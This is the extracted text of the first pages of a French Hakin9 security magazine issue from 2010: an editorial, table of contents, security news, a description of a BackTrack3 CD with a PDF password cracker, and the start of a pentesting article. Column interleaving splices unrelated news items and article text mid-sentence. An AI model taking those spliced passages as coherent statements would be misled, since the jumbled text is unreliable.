You are on page 1of 84

01___okladka.

indd 1 2010-03-11, 15:21:38


02__egilia.indd 1 2010-03-10, 15:26:09
ÉDITORIAL

Audit de sécurité au
service des entreprises
Aujourd'hui, presque plus personne n'est à l'abri des e-menaces :
attaques malveillantes, phishing ou spam. En effet, les attaques
sont de plus en plus „sophistiquées” et très difficiles à détecter.
Pour mieux prévenir ces menaces, il est nécessaire de ne pas y aller
de main morte. Ceux qui souhaitent apprendre à mieux protéger
leur système d'information s'aideront de notre dossier sur l'Audit
de sécurité. En effet, dans ce numéro, nous nous concentrerons
sur les Tests de pénétration. Grâce à l'article de Régis Senet
Tests de pénétration système, vous apprendrez ce qu'est un test
d'intrusion, sa procédure et son déroulement. L'article intitulé Test
de pénétration – organisation du projet vous expliquera comment
vous préparer et mener un projet de tests de pénétration au sein de
votre entreprise. L'auteur de cet article vous présentera quelques
méthodologies et vous aidera à choisir celle appropriée à votre
société.
Dans la section Pratique, nous vous recommandons l'article sur les
réseaux WiFi mal sécurisés. L'article Intrusion et exploitation d'un
réseau mal sécurisé vous expliquera le fontionnement du WEP et
ses faiblesses ; les particuliers comme les entreprises font souvent
appel à des points d'accès WiFi. Or, le protocole de chiffrement
WEP (41% des box en possèdent) présente plusieurs failles.
Vu la popularité grandissante des sujets liés à la sécurité des
réseaux et du Web, nous avons créé, pour nos lecteurs, une nouvelle
rubrique : Sécurité Réseaux. Dorénavant, vous trouverez dans
chaque numéro de Hakin9, un article consacré à cette thématique.
Cette fois-ci, l'article est dédié à la sécurisation des applications
Web. L'auteur de l'article Sécuriser les applications Web présentera
les moyens techniques à mettre en place pour sécuriser efficacement
les applications web. Vous trouverez également quelques bonnes
pratiques à ne pas manquer dont le filtrage des attaques web.

Bonne lecture à tous,


Aneta Mazur
aneta.mazur@hakin9.org

3/2010 HAKIN9 3

03______wstepniak.indd 3 2010-03-11, 12:19:16


SOMMAIRE
DOSSIER ATTAQUE
12 Mécanisme de Sécurité 34 Automatiser l'exploitation
RÉGIS SENET de vulnérabilité lors
De nos jours, avec l’explosion relativement d'un test d'intrusion
récente des réseaux 3G, les besoins en ERIC BEAULIEU
termes de connectivité en environnement L'une des étapes la plus longue, mais peut être
professionnel sont constants. Les nouveaux la plus intéressante, durant un test d'intrusion, est
smartphones professionnels tels que l’iPhone l'exploitation des vulnérabilités découvertes. Celle-
d’Apple ou encore le Blackberry de RIM offrent ci, réalisée traditionnellement après la découverte
de puissantes fonctionnalités permettant aux du périmètre et des hôtes qui le composent et le
professionnels nomades de rester connecté plus souvent soumise à accord du client. Dans cet
à leurs emails, calendriers, intranets et autres article, nous allons donc voir comment gagner du
outils du quotidien ainsi qu’aux utilisateurs temps en automatisant l'exploitation de vulnérabilités
classique. Toutefois, si ces terminaux ne sont découvertes lors de l'analyse du réseau. Certains
pas déployés et gérés correctement, ils peuvent lecteurs n'apprendront rien dans cet article, mais
présenter des risques significatifs en matière d'autre y découvriront peut-être comment installer
de sécurité. et faire interagir ces outils.

16 Mécanisme de Sécurité 42 Remote download exécution


sous Android avec java : utilisation
BABACI NABIL et protection
CHRISTOPHE B. AKA T0FX
Faire du développement Open-Source devient La plate-forme Java fut l’un des premiers systèmes
de plus en plus tendance, surtout si nous pouvons à offrir le support de l’exécution du code à partir de
profiter à la fois de services qui ont fait leurs sources distantes. Un applet peut fonctionner dans
preuves dans ce domaine comme le fait si le navigateur web d’un utilisateur, exécutant du code
bien Google. téléchargé depuis un serveur HTTP. Le code d’une
Nouveau sur le marché des OS embarqués applet fonctionne dans un espace très restrictif, ce
pour les smartphones, Android propose toute qui protège l’utilisateur des codes erronés ou mal
une panoplie de services centrés utilisateur mais intentionnés. Cet espace est délimité par un objet
offre aussi une plateforme de développement appelé gestionnaire de sécurité. Un tel objet existe
alliant puissance et simplicité, offrant les aussi pour du code local, mais il est alors par défaut
mécanismes de sécurité les plus récents inactif.
et des plus faciles simple à mettre en oeuvre.

FOCUS PRATIQUE
48 Windows FE Live CD
20 Restaurer les symboles de d'investigation informatique
débogage à partir de binaires Windows-PE
compilés statiquement MARC REMMERT
JUSTIN SUNWOO KIM Au cours de l'année 2008, des rumeurs ont circulé
La restauration des symboles de débogage sur la distribution d'un Live CD Microsoft Windows
est primordiale pour mieux appréhender les FE. Sur Internet tous les types de sujets étaient
problèmes spécifiques aux fichiers binaires abordés dont celui de la sécurité et de l'investigation
strippés. La méthode exposée dans le présent informatique, pourtant ce CD Windows n'a pas
article peut être réutilisée dans d'autres champs connu un franc succès.
d'étude.

4 HAKIN9 1/2010

04_05_SPIS_TRESCI.indd 4 2010-01-12, 13:53:24


SOMMAIRE
60 La sécurité des réseaux
bluetooth VARIA
RÉGIS SENET
Bluetooth est une spécification de l'industrie 06 En bref
des télécommunications. Elle utilise une NICOLAS HILY
technologie radio courte distance destinée Vous trouverez ici les nouvelles du monde
à simplifier les connexions entre les appareils de la sécurité des systèmes informatiques.
électroniques. Elle a été conçue dans le but de
remplacer les câbles entre les ordinateurs 10 Sur le CD-ROM
et les imprimantes, les scanners, les claviers, Nous vous présentons le contenu et le mode
les souris, les manettes de jeu vidéo, les de fonctionnement de la version récente
téléphones portables, les PDA, les systèmes de notre principale distribution hakin9.
et kits mains libres, les autoradios, les appareils Et les applications commerciales
photo numériques, les lecteurs de code-barres,
les bornes publicitaires interactives.

Le bimestriel hakin9 est publié par Software Press Sp. z o. o. SK

TECHNIQUE Président de Software Press Sp. z o. o. SK: Paweł Marciniak


Directrice de la publication: Ewa Lozowicka
Redacteur en chef: Jakub Borowski jakubborowski@hakin9.org
Fabrication: Andrzej Kuca andrzej.kuca@software.com.pl
64 LA RAM : Une vulnérabilité DTP : Graphics & Design Marcin Ziółkowski www.gdstudio.pl
Couverture : Agnieszka Marchocka
avérée des FDE Couverture CD : Przemyslaw Banasiewicz
JÉRÔME BISE Publicité : publicite@software.com.pl
Les systèmes de chiffrement de disque à la Abonnement : software@emdnl.nl
Diffusion : Ilona Lepieszka Ilona.lepieszka@software.com.pl
volé (FDE, on the Fly Disk Encryption) sont des Dépôt légal : à parution
logiciels permettant d'assurer la confidentialité ISSN : 1731-7037
des données. Ces systèmes permettent de Distribution : MLP
Parc d’activités de Chesnes, 55 bd de la Noirée BP 59 F - 38291
chiffrer/déchiffrer les données d'un disque SAINT-QUENTIN-FALLAVIER CEDEX
dur (ou d'un conteneur) lorsque l'on y accède. (c) 2009 Software Press Sp. z o. o. SK, tous les droits réservés
Ils sont complètement transparents pour les
Béta-testeurs : Didier Sicchia, Pierre Louvet, Anthony Marchetti,
utilisateurs (excepté la saisie d’un mot de passe). Régis Senet, Paul Amar, Julien Smyczynski
L'utilisation de FDE est aujourd'hui de plus en
plus courante, que ce soit par des entreprises Les personnes intéressées par la coopération sont invitées
à nous contacter : fr@hakin9.org
ou des particuliers pour assurer la confidentialité
des données. Préparation du CD : Rafal Kwaśny
Imprimerie, photogravure : ArtDruk www.artdruk.com
Adresse de correspondance :
A cause de plusieurs méprises dans le procès de production Software Press Sp. z o. o. SK
dans notre magazine l'article « La RAM: une vulnérabilité avérée Bokserska 1, 02-682 Varsovie, Pologne
des disques chiffrés » de notre auteur Jérome Bise a été publié Tél. +48 22 427 32 87, Fax. +48 22 244 24 59
avec plusieurs erreurs. Dans cette issue nous publions la version www.hakin9.org
corrigée par l'auteur. Nous prions l'auteur et ses collaborateurs de
Abonnement (France métropolitaine, DOM/TOM) :
bien vouloir accepter nos sincères excuses.
1 an (soit 6 numéros) 35 €
La rédaction fait tout son possible pour s’assurer que les logiciels
sont à jour, elle décline toute responsabilité pour leur utilisation.
72 L'argent sales des Elle ne fournit pas de support technique lié à l’installation ou l’utilisation des logiciels
cyber-criminels enregistrés sur le CD-ROM.
Tous les logos et marques déposés sont la propriété de leurs propriétaires
GUILLAUME LOVET respectifs.
Arnaqueurs, phishers, bot herders, spammeurs, Le CD-ROM joint au magazine a été testé avec AntiVirenKit de la
extorqueurs en-ligne, voleurs d’identité... Leurs noms société G Data Software Sp. z o.o.

semblent obscurs mais leurs intentions ne le sont AVERTISSEMENT


pas : ils sont tous là pour voler notre argent. Les techniques présentées dans les articles ne peuvent être
utilisées qu’au sein des réseaux internes.
La rédaction du magazine n’est pas responsable de l’utilisation incorrecte des
techniques présentées.
L’utilisation des techniques présentées peut provoquer la perte des données !

1/2010 HAKIN9 5

04_05_SPIS_TRESCI.indd 5 2010-01-12, 13:53:37


EN BREF
qui existent, pour être mieux équipés
WALLIX S’IMPLANTE EN GRANDE afin de faire le choix le plus judicieux LES FAILLES DE CHROMIUM À 1
BRETAGNE qui satisfera les besoins spécifiques de 337 DOLLARS
votre entreprise. Ce cours est rapide, et Google fait appel aux développeurs pour
afin de bien comprendre les sujets qui mettre au jour les failles de Chrome. La
seront discutés, on s'attend à ce que chasse aux bugs est ouverte dans tous
les étudiants aient une connaissance les pays du monde. Celui qui découvrira
de base du protocole TCP/IP. Bien que le bug de Chromium en premier, aura la
d'autres puissent également bénéficier récompense. Les récompenses iront de
Wallix, éditeur européen de logiciels de de son contenu, ce cours a été conçu 500 à 1 337 dollars. Celle dernière est
sécurité informatique pour la gestion pour les étudiants qui sont ou qui réservée pour les failles dangeureuses.
des identités et des accès (l’IAM) deviendront des analystes de détection Google déterminera quelles sont les
lance ses activités au Royaume-Uni et d'intrusion. failles éligibles ou non. En même temps,
ouvre un bureau à Reading (Comté de Pour s'inscrire et plus de détails: http: Google prévient que les problèmes de
Berkshire). //www.sans.org/info/55893 sécurité liés aux plug-in développés par
WALLIX est le leader français des des éditeurs tiers ne seront pas pris en
logiciels de sécurité informatique pour la compte.
gestion des infrastructures informatiques
critiques. L’éditeur répond aux besoins
de gestion des accès et de traçabilité UNE ATTAQUE DE PHISHING CHEZ
avec une approche simple et PAYPAL
économique, sans installation d’agents L'arnaque a eu lieu le vendredi 9 janvier 2010
spécifiques sur les équipements et et il a été particulièrement bien préparée..
sans contraintes de déploiement dans le A ce moment là certains utilisateurs ont
système d’information du client. reçu un courriel prétendument envoyé par
Poursuivant sa stratégie de PayPal.
développement sur les marchés L'email demandait aux utilisateurs
européens, WALLIX a choisi de déployer de mettre à jour le contrat qui les liaient
au Royaume-Uni son offre "Wallix Admin au système de paiement électronique.
Bastion", le WAB, solution innovante Ce courrier venait d'un pirate désirant
en matière de sécurisation des récupérer les identifiants (login et mot de
systèmes d’information qui combine la passe) des comptes utilisateurs et pas du
gestion des identités, le contrôle des site eBay.
accès et la traçabilité des opérations
informatiques. Pour plus d'informations
: www.wallix.com FAILLE DE LA TOUCHE F1. OFFICE 2010
Microsoft vient de confirmer qu'une faille Microsoft lance en juin une nouvelle
de la touche F1 existe et concerne toutes version d'Office 2010. Trois éditions
COMMUNITY SANS À NICE, LE les versions de son navigateur Internet : distinctes seront disponibles :
21-26 JUIN celles qui tournent sous Windows 2000,
SANS vient en France pour offrir l'un de XP, et Server 2003. Sauf Windows 7, Vista, • Office Famille et Etudiant 2010
ses cours les plus demandés, SEC503: et Server 2008 qui en sont épargnés. Le • Office Famille et Petite Entreprise
Détection d'Intrusion Informatique, pour la piège consite en création d' une boîte 2010
première fois enseigné en français de dialogue par un site malveillant, • Office Professionnel 2010.
L'emphase de ce cours porte sur une demandant à l'internaute d'appuyer sur
bonne compréhension du fonctionnement la touche F1. Attention ! Vous pourriez L'édition Professionnel, la plus complète,
TCP/IP, des méthodes d'analyse de trafic ainsi donner l'accès aux pirates à votre comprend, hors de logiciels de base
réseau, et d’un système de détection machine. (Word, Excel, PowerPoint, OneNote
d'intrusion (NIDS) - Snort. Ce n'est pas « Cette faille est liée à l'interaction et Outlook) les logiciels Access et
une comparaison ou la démonstration de VBScript avec les fichiers d'aide Publisher.
de multiples NIDS. Nous fournissons de Windows quand on utilise Internet Toutes les trois éditions seront
plutôt une connaissance qui permet aux Explorer », peut-on lire dans une alerte de vendues sous deux formats : boîtes (avec
élèves de mieux comprendre les qualités sécurité émise sur Microsoft TechNet . disque d'installation) et carte d'activation
qui vont les aider à déterminer un bon Pour l'instant, il n'y pas de patch (soit une version OEM vendue avec un PC
NIDS/NIPS, les différentes technologies diponible. neuf) sans disque d'installation.

6 HAKIN9 3/2010

06_07___news.indd 6 2010-03-10, 15:47:05


NEWS

Pour le format boîte, les prix TTC


moyens balancent entre 139 euros pour
Office Famille et Etudiant jusqu'à 699
euros pour l'édition Professionnel.
Les prix pour les versions carte
d'activation sont inférieurs (entre 109
et 499 euros) mais contrairement aux
éditions boîtes, ne permettent pas
l'installation sur plusieurs postes.

IPAD EN FRANCE
Le terminal lancé aux Etats-Unis le 3 avril
vient de débarquer en Europe.
Presqu' un mois après l'apparution
aux Etats Unis, iPad arrive aussi en de chaque mot de passe tapé sur Twitter, la plus fréquente menace constatée en
Australie, au Canada, en Allemagne, en les internautes devraient profiter de cette France. Ce ver exploite la fonction de
Italie, au Japon, en Espagne, en Suisse et information et changer leurs mots de démarrage automatique qui s’applique
au Royaume-Uni. passe aussi dans les autres services. généralement au chargement d’un CD
Avec un design similaire à l'iPhone contenant un programme exécutable. En
grand format, l'iPad possède un écran infectant plus généralement des clés USB,
9,7 pouces tactile capacitif (1024x768), et UNE CENSURE CROISSANTE ce virus s’exécute sur l’ordinateur dès
d'un processeur SoC Apple (développé DANS L'INTERNET l’insertion du média au lieu du programme
par PA Semi) cadencé à 1GHz. Apple Dans le rapport annuel des Reporters sans souhaité. Au cours du mois de février
jure la capacité de son appareil pour 10 frontières se montre un constat inquiétant: 2010, INF/Autorun a représenté 7,85% des
heures en usage et 1 mois en veille. Il est les blogueurs et les sites internet sont de menaces. À la seconde place, Win32/
possible de synchroniser son iPad avec plus en plus nombreux à être touchés par PSW. OnlineGames continue de perturber
iTunes via un câble USB pour le relier à la censure et la répression avec plus de les joueurs en ligne en atteignant le taux
un ordinateur. 155 % par rapport à 2008. de 6,22%. Il reste la référence des chevaux
Ayant pour objectif de se présenter de Troie dans le domaine des jeux en
comme un livre électronique à part ligne commercialisés principalement sur
entière, l'iPad comprend une application INTERNET PARMI LES DROITS DE le marché noir.
iBooks permettant une lecture entièrement L'HOMME? Le virus Win32/Mabezat vient en
contrôlée avec les doigts. Près de 80 % des adultes dans le monde troisième position avec un taux de
Selon les sondages francais 73% estiment que l’accès à internet est un droit 4,08%, laissant le fameux Win32/
des internautes ayant entendu parler de humain fondamental. Un peu moins de la Conficker prendre la quatrième place
l'appareil se disent prêts à acheter l'iPad moitié affirme ne pas pouvoir se passer des menaces constatées en France
(parmi les possesseurs de produits Apple d’internet malgré quelques inquiétudes en février 2010. Exploitant une faille
il s'agit de 96%). sur la sécurité du Web. de l’OS Windows Server de Microsoft,
Win32/Conficker affiche un score de
3,07%. À l’évidence, les mises à jour
TWITTER – PROTÉCTION RAPPORT MENSUEL DES régulières de sécurité, proposées par
RENFORCÉE MENACES IDENTIFIÉES PAR ESET Microsoft, s’imposent. À noter que ce
Twitter veut protéger ses abonnés contre EN FRANCE ET EN EUROPE virus apparaît en tête en Europe avec un
tout risque d'usurpation de leur compte en Février 2010 taux de 9,62%.
interdisant la création de mot de passe Quant au virus Win32/Agent, il se
jugés trop simples. Pour le faire il a créé • L’infection des médias amovibles est positionne à la cinquième place avec
une liste noire de 370 mots de passe la principale menace constatée en un taux de 2% en France et de 3,57% en
dont beaucoup sont de prénoms, des France Europe. Il continue de progresser mois
marques de voiture, des noms de villes, • Les joueurs en ligne sont toujours après mois en approchant le niveau
des mots grossiers... Ce que provoque menacés par Win32/PSW. Online- qu’il avait atteint pendant l’été 2009. ESET
les questions c'est le fait que l'origine Games considère cette menace comme une
et les critères qui ont présidé à son forme de ver malicieux entrant dans la
élaboration restent inconnus. Pourtant, si En modifiant le contenu d’un média catégorie des PC data stealer, c’est à dire
elle provient d'une analyse systématique amovible, le virus INF/Autorun demeure le piratage de données.

3/2010 HAKIN9 7

06_07___news.indd 7 2010-03-10, 15:47:13


EN BREF
professionnels ont été sécurisés par WPA, un outil qui permet aux cybercriminels
HADOPI pendant qu'aujourd'hui leur nombre atteint de monétiser leurs efforts sur le marché
Le ministre de la Culture Frédéric Mitterrand 72%. noir.
a confirmé que Hadopi - la haute autorité Le dernier mois de l'année 2009
pour la diffusion des oeuvres et la voit INF/Autorun une fois encore à la
protection des droits sur Internet, a enfin FLASH DANS L'IPHONE ? deuxième position. Ce type de menace
commencé à fonctionner. Le temps de Selon AppleInsider, Apple planifie en 2010 modifie le fichier autorun.inf enregistré sur
l'envoi des premiers avertissements aux d' obtenir quelques dizaines de millions les supports amovibles, permettant ainsi
quelques téléchargeurs qui passeront de flash à base de LED. La technologie d’exécuter des applications, nuisibles
dans les filets d'Hadopi au printemps, au Luxeon LED de Philips limiterait peut-être lors de l'insertion des médias dans
pire en juillet 2010 - n'a pas été annoncé l'intérêt des applications de lampe de l'ordinateur. Suivant dans le classement,
qu'en janvier 2010. poche disponibles en grand nombre sur Win32/Mabezat, un cheval de Troie
Le dernier obstacle pour que l’Hadopi l'App Store. Son avantage principale est ciblant les sites web en langue arabe. En
ait la voie totalement libre est l'opinion la possibilité d'un éclairage continu en Décembre, il a représenté 5,56% de tous
de la CNIL sans lequel le décret dont prenant de vidéos en situation d'éclairage les logiciels malveillants, rapportés par
a besoin l'autorité pour être efficace ne faible. ESET ThreatSense.Net ®.
peut pas être publié. La CNIL a déja Jusqu'à présent l'absence de flash Win32/Conficker est un autre habitué
retardé la mise en travail d' Hadopi en était le désavantage de l'iPhone marqué des statistiques de menaces françaises.
exigeant d'obtenir un projet de décret le plus souvent depuis son apparance. Il Avec 4,78%, le ver occupe la quatrième
concernant la procedure de sanction est possible qu'avec la prochaine version position. Le top 5 se conclut avec
appliquée aux téléchargeurs. Mais à de son produit la firme de Cupertino Win32/Sality. Contrairement à la plupart
part de ces difficultés, cette autorité surpassera sa concurrence: Droid/ des logiciels malveillants – constitués
est désormais prête à commencer son Milestone, le Pré ou le Nexus. habituellement d'un seul code malveillant
travail. - Win32/Sality est un corrupteur de
fichiers, qui implique le nettoyage des
RAPPORT DES MENACES fichiers infectés. Au mois de Décembre,
WIFI EN SÉCURITÉ La communauté de jeu en France est ce virus a représenté 3,10% de toutes les
L'état de la sécurisation des points toujours menacée par de gros volumes détections.
d'accès est loin d'être satisfaisante, de Troyens Win32/PSW.OnlineGames. Principales menaces d'ordinateurs en
notamment dans le grand public – Comme l'a montré ESET ThreatSense.Net France selon ESET ThreatSense.Net®
alarme la société WeFi, agrégateur de ®, le système statistique d'analyse de (décembre 2009)
points d'accès WiFi. Selon ses études données relatives aux malwares, ce
25% des réseaux européens sont type de menace représente une part de
protégés par aucun mot de passe, ce 8,87% de tous les logiciels malveillants ORDIANTEUR SANS CLAVIER ?
qui veut dire qu'un utilisateur sur quatre détectés en France. En volant des MSI présente des prototypes d'ordinateurs
ne prend pas la peine de crypter son données d'authentification pour les jeux portables où le clavier a été remplacé par
accès (clé WEP et WPA.) en ligne, Win32/PSW.OnlineGames est un second écran.
Ce résultat est inquiètant en tenant
compte que le WiFi est aujourd'hui
presque partout utilisé personnellement
ou professionnellement.
La société WiFi a constaté que les
réseaux les plus sécurisés se trouvent
en Allemagne et en Espagne (90%
des réseaux sécurisés), la France
a le résultat de 80% de sécurisation.
C'est donc au-dessus de la moyenne
européenne. La situation en Europe se
présente quand même mieux qu'aux
États-Unis, où 40% des réseaux WiFi ne
sont pas protégés.
Dans le domaine des réseaux WiFi
professionnels, la tendance est assez
similaire. Selon une étude de RSA, en
2004 à Paris 68% des points d'accès

8 HAKIN9 2/2010

06_07_____NEWS_FR.indd 8 2010-03-11, 12:43:16


NEWS

prévoit lobtention d'une 'autorisation afin


de pouvoir diffuser les images animées
sur la Toile. On peut se demander
si toute vidéo diffusée sur Internet
devra obenir un droit de diffusion.
Vraisemblablement, la mesure va
être concerner les Web TV et sites de
journaux. L'opposition italienne ne cesse
pas de crier au scandale en évoquant
l'argument de l'atteinte à la liberté
d'expression sur le Web.

UNE PANNE GIGANTESQUE DANS


10 ANS ?
Les consoles de jeux vidéo risquent de
nous coûter cher dans 10 ans. Comme
l'informe le cabinet Sia Conseil, les
consoles pourront consommer de plus
en plus d'électricité.
En se basant sur les études du cabinet
MSI propose des ordinateurs de conseil Sia, en 2020, les consoles de
portables sans clavier. En effet, toutes L'ENCYCLOPÉDIE À 7,5 MILLIONS jeux vidéo seraient tellement sollicitées
les fonctionnalités du claiver s repris un DE DOLLARS que la consommation d'électricité
second écran qui peut se transformer en 7,5 millions de dollars, c’est la somme annuelle en France pourrait dépasser
clavier tactile. Voici quelques usages : record que l’encyclopédie en ligne les 700 gigawatt-heure (GWh). Cela
Wikipédia a perçue en 2009. Constituée représenterait la consommation annuelle
• en tant que portable de dons faits de la part de lecteurs au site, d'une ville telle que Nice.
• tablette de dessin cette somme va permettre de financer le
• e-book site sans publicité en 2010. Que faire ? Changeons nos
Jimmy Wales, fondateur de Wikipédia habitudes !
MSI expose sur son stand également le l'explique ce phénomème en quelques Cetaines consoles de jeux vidéo
Jellow, un autre prototype d’ordinateu. mots : < Wikipédia n’est pas financée sont régulièrement épinglées comme
Doté d’un écran Full HD de 23 pouces, par la publicité, mais par vous. Wikipédia Nintendo par Greenpeace. Quant à Wii,
le Jellow embarque un clavie caché est le cinquième site Web le plus visité elle est moins gourmande en électricité.
derrière cet écran. La souris pourra servir au monde, et vos dons financent nos Certaines régions (par exemple
de télécommande, ou de téléphone. serveurs et nos quelques employés. Vos Bretagne et Provence entre autres) sont
Reste à savoir si le constructeur dons permettent de conserver Wikipédia davantage exposées à ce risuqe. En
envisagera de commercialiser ce libre d’accès et sans publicité. Vos effet, ces consoles pourraient ébranler
produit. dons permettent d’offrir un accès libre des systèmes électriques vulnérables
à la connaissance aux quatre coins du lorsqu'elles seraient utilisées en même
monde>. temps qu'autres appareils (télévisions
MISSION DE ZELNIK L’encyclopédie libre et gratuite a réuni évidemment, ordinateurs...).
En septembre 2009, la commission la somme de 7,5 millions de dollars Une inquiétante prévision de l'Agence
Zelnik a reçu la mission de compléter les en seulement huit semaines. Avec les internationale de l'énergie, qui s'attend
mresures prévues par la loi Hadopi. L'idée statistiques très promettants : 250 millions à ce que la consommation de toutes
est de mettre en place une taxte sur les de visiteurs par mois et 14 millions ces machines triple d'ici 2030 à 1 700
revenus de la publicité en ligne en visant d’articles dans 270 langues, Wikipédia est térawatt-heure (Twh).Il est tepms d'y
notamment les géants : Google, Microsoft le cinquième site le plus visité au monde penser sérieusement, car c'est l'équivalent
et Yahoo. Comme on pouvait s'en douter, ! Il est le seul dans le haut du classement de la consommation actuelle des
la mission de Zelnik suscite des réactions qui ne propose aucune publicité à ses ménages américains et japonais
offusquées de la part des fournisseurs de utilisateurs, et il ne fonctionne que grâce
services, visés par Nicolas Sarkozy qu'il à ces campagnes de dons.
juge coupables de favoriser une évasion Vidéo en Italie sous contrôle
fiscale . A partir du 27 janvier 2010, un décret

2/2010 HAKIN9 9

06_07_____NEWS_FR.indd 9 2010-03-11, 12:43:26


SUR LE CD

CD-ROM – HAKIN9.LIVE

BACKTRACK3 cette version de BackTrack3 hakin9.live Chaque paquet, configuration de


Ce numéro du magazine hakin9 est contient également des éditions noyau et script contenu dans BackTrack3
proposée avec hakin9.live (accompagnée spéciales d'applications commerciales est optimisé de manière à être utilisé par
du CD BackTrack3). Cette distribution est parmi les plus intéressantes du les experts en audits de sécurité et de
riche en applications et autres plugins. moment. Elles sont préparées tests d'intrusion. Les patchs de correction
BackTrack3 est la distribution Linux exclusivement à l'attention toute et autres scripts automatiques ont été
live la plus pertinente dans le registre particulière de nos lecteurs. ajoutés, appliqués ou développés de
de la sécurité informatique. Sans Pour pouvoir utiliser BackTrack3 manière à proposer un environnement
aucune installation préalable, la plate- hakin9.live, il vous suffit de démarrer votre agréable, intuitif et prêt à l'emploi.
forme d'analyse peut être directement ordinateur à partir du CD. Pour pouvoir Les quelques nouvelles fonctionnalités
démarrée à partir du CD-Rom et son utiliser les applications commerciales de BackTrack3 sont présentées avec
contenu entièrement accessible en fournies, inutile de démarrer votre ordinateur BackTrack3 hakin9.live. La fonctionnalité
quelques minutes seulement. Outre les à partir du CD : vous les trouverez dans le la plus importante est incontestablement
mises à jour et d'autres optimisations, dossier baptisé Applications. l'utilisation du noyau 2.6. mis à jour à l'aide
de plusieurs programmes de correction.
Un support pour la carte sans fil
Broadcom a également été rajouté et des
pilotes WiFi ont été élaborés de manière
à supporter les injections de paquets
bruts. L'intégration du cadre d'application
Metasploit2 et Metasploit3 est également
disponible ainsi qu'un alignement
permettant d'ouvrir des standards et des
cadres d'applications tels que ISSAF et
OSSTMM.

PDFCRACK
PDFCrack est un petit outil Open Source
(GNU/Linux) qui est destiné à craquer les
mots de passe des documents PDF. Pour
suivre pas à pas le craquage du mot de
passe, il ne vous reste qu'à regarder la
vidéo. Vous trouverez quelques conseils
de protéction dans l'article d' Alexandre
Lacan Sécurité des mots de passe dans
les fichiers PDF.

10 HAKIN9 2/2010

08___opis_cd.indd 10 2010-03-11, 12:44:06


HAKIN9.LIVE

S’il vous est impossible de lire le CD. et que ce dernier n’est pas
endommagé physiquement, essayez de lire dans au moins 2
lecteurs différents.

En cas de problème avec votre CD, envoyez-nous un message


à l’adresse suivante : cd@hakin9.org

6/2008 HAKIN9 11

11_POD_CD_FR.indd 11 2010-03-10, 15:48:45


DOSSIER
Test de
RÉGIS SENET

pénétration
Degré de difficulté
système
De nos jours, garder la sécurité du systeme d’information reste
primordial pour les entreprises. Le présent article expliquera
comment protéger son SI grâce aux tests de pénétration.

U
n test de pénétration système, aussi relatives aux biens et aux personnes alors que
appelé test d’intrusion ou encore cela n’est pas possible par un pentest.
régulièrement abrégé en pentest, est une A l’inverse d’une réelle intrusion, un pentest,
méthode d'évaluation de la sécurité d'un système bien qu’assez libre, resté néanmoins encadré.
ou d'un réseau informatique durant un laps de La personne en charge de réaliser ce(s) test(s)
temps déterminé. se doit de signer un contrat avec l’entreprise
Ce(s) test(s) consiste(nt) à simuler l’attaque accueillant le test. Ce contrat inclut des clauses
par un utilisateur mal intentionné ou par un de non-divulgation au cas où une faille serait
logiciel malveillant. Sont alors analysés les risques détectée. Le prestataire s’engage également à
potentiels dus à une mauvaise configuration d'un prendre toutes les mesures nécessaires pour
système, d'un défaut de programmation ou encore sécuriser les données des clients.
d'une vulnérabilité liée à une solution présente Il existe de nombreux prestataires de services
dans le système informatique cible. aptes à réaliser ce genre de test d’intrusion.
Lors d'un test d'intrusion, nous nous retrouvons Initialement appelés Hackers, ce nom fut petit à
donc dans la position de l'attaquant potentiel. Le petit détourné par les internautes pour n’y voir que
principal but de cette manœuvre est de trouver des pirates informatiques alors qu’initialement, il
des vulnérabilités exploitables en vue de proposer n’en est rien. Afin donc de bien faire la distinction
un plan d'actions permettant d'améliorer la entre le bon et le mauvais coté, un nouveau terme
sécurité d'un système. est apparu, il s’agit des Ethical Hackers.
Il est important de faire la différence entre Comme indiqué précédemment, à la suite
un test de pénétration système et un audit de d’un pentest, un Ethical Hacker se doit de
sécurité. La différence entre les deux réside fournir un rapport de son activité. Ce rapport
1. CET ARTICLE dans la motivation de la personne à aller devra comporter l’ensemble des trouvailles du
EXPLIQUE... jusqu'à l'exploitation des failles, montrant ainsi la prestataire avec un indice de gravité des failles. Au
Ce qu’est un test de pénétration vulnérabilité. L'exploitation n'a, bien sûr, pas pour cas où une faille critique serait trouvée durant le
Comment réaliser un test de but de détruire ou endommager le système, mais test de pénétration système, il est de bon ton que
pénétration elle permettra de situer le degré du risque lui étant le prestataire s’arrête afin de prévenir l’entreprise
Quel est l’intérêt de mettre en associé. demandeuse de service.
place un test de pénétration
Un audit de sécurité, quant à lui, est plus Une fois le pentest terminé, l’auditeur rend
CE QU'IL FAUT théorique qu’un pentest. Néanmoins, grâce à un son rapport aux responsables de son test de
SAVOIR... audit de sécurité, l’architecture est auditée, ainsi pénétration. Ce dernier doit obligatoirement
Bases en sécurité informatique que les méthodologies de sécurité mise en place, être remis en format papier en main propre ou

12 HAKIN9 3/2010

pentest.indd 12 2010-03-10, 15:52:47


TEST DE PÉNÉTRATION SYSTÈME

encore, par voie informatique sécurisée. l’entreprise, il est donc nécessaire de ne 50,2% des attaques avaient pour objectif
Il est nécessaire de se rappeler que les pas oublier ce genre de test. d’exploiter les ressources informatiques
rapports sont strictement confidentiels. WhiteBox – Au cours de ce genre de d’entreprises victimes ciblées au hasard
Le prestataire n’est pas dans test, l’Ethical Hacker connait l’ensemble : stockage, puissance de calcul, réseau
l’obligation de réparer les failles qu’il aura des informations relatives à l’entreprise sont ensuite utilisés ou revendus pour
décelées sauf si cette option a été ajoutée : du code source du site internet, au d’autres activités criminelles ou illicites.
aux contrats. schéma de configurations des routeurs De plus, depuis l’avènement de la
tout en passant pour le code source loi Hadopi, les petites entreprises sont
Comment se déroule un de l’application C++ leur servant de également devenues des cibles pour du
test de pénétration système passerelle réseau. Ces tests sont les plus stockage de film en masse ou l’utilisation
Différents test de pénétration système complets car ils allient les techniques abusive de connexion sans fil.
existent. Trois types de pentest diffèrent en des tests BlackBox en ajoutant des A l’heure actuelle, la sécurité
raison des informations que connaîtra le informations complémentaires. Ces tests informatique concerne réellement tout le
prestataire de service à son début. sont également, en règle générale, les monde même si les tests de pénétration
L'analyse se réalise donc selon trois plus longs. système étant assez chers, sont
cas : principalement destinées aux entreprises
BlackBox – Au cours de ce genre de Qui est concerné par un disposant d’un parc informatique et/ou de
test, l’Ethical Hacker se met réellement test de pénétration système données sensibles.
dans la peau d'un attaquant potentiel Aujourd’hui, quasiment personne n’est
et ne possède aucune information sur à l’abri des attaques en provenance Qu’est ce qui peut être
le réseau ou sur les infrastructures d’internet. Les média parlent de plus en testé durant un test de
